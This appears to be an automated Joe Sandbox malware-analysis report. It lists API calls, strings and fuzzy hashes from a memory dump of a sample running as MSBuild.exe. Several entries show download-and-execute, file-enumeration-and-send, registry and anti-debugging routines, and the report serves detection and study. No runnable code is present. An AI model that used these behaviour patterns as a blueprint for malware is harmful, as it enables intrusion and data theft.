                                                                                                • Opcode Fuzzy Hash: c0514443f6b551c60d72a0102ad1ef2ed694fa26d927559f69c4179237a11564
                                                                                                • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$open
                                                                                                • API String ID: 2825088817-2582742282
                                                                                                • Opcode ID: e23bf9b323bc2d692f9da81d03bbc7a22c6eb775334b1cc8aa9487b0952805cd
                                                                                                • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                • Opcode Fuzzy Hash: e23bf9b323bc2d692f9da81d03bbc7a22c6eb775334b1cc8aa9487b0952805cd
                                                                                                • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                • String ID: x@G$x@G
                                                                                                • API String ID: 4113138495-3390264752
                                                                                                • Opcode ID: 8eaf7a4dc88b03731bc7a7e88c07bbd056d3bb85fccf69746681b5b9b90b18b3
                                                                                                • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                • Opcode Fuzzy Hash: 8eaf7a4dc88b03731bc7a7e88c07bbd056d3bb85fccf69746681b5b9b90b18b3
                                                                                                • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                  • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                  • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                  • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                  • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: 3cca19850bf31f4f0fb7f64d74422f26e2d0d512dadd11c93372ceda303b45d5
                                                                                                • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                                                • Opcode Fuzzy Hash: 3cca19850bf31f4f0fb7f64d74422f26e2d0d512dadd11c93372ceda303b45d5
                                                                                                • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 4212172061-0
                                                                                                • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstH_prologNext
                                                                                                • String ID:
                                                                                                • API String ID: 301083792-0
APIs
• _free.LIBCMT ref: 00448067
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• GetTimeZoneInformation.KERNEL32 ref: 00448079
• WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
• WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
Similarity
• API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
• String ID:
• API String ID: 806657224-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
• TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
• ExitProcess.KERNEL32 ref: 0044258E
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                                • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                                • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                APIs
                                                                                                  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                • EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BG3i@
                                                                                                • API String ID: 0-2407888476
                                                                                                • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                                                                • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                                                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                                                                • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >G
                                                                                                • API String ID: 0-1296849874
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                                                                • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: eb6dcd73bfffb07de0d33a6a12f14aa0d82b51f90d467ca14a8fa5a669e44218
                                                                                                • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                                                                • Opcode Fuzzy Hash: eb6dcd73bfffb07de0d33a6a12f14aa0d82b51f90d467ca14a8fa5a669e44218
                                                                                                • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                                                                • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                                                                • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf641ef7c9a5d5f4565f47108fcd6adb42aefad3228fb1ad0f8822469bddd740
                                                                                                • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                                                                • Opcode Fuzzy Hash: bf641ef7c9a5d5f4565f47108fcd6adb42aefad3228fb1ad0f8822469bddd740
                                                                                                • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                                                                • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction ID: c2ccfb52f11e3b3b259396a7657262a28929e77abe156aeb413db61674ad6f9a
                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction Fuzzy Hash: EB91C8722080A319DB2D463E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D564D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
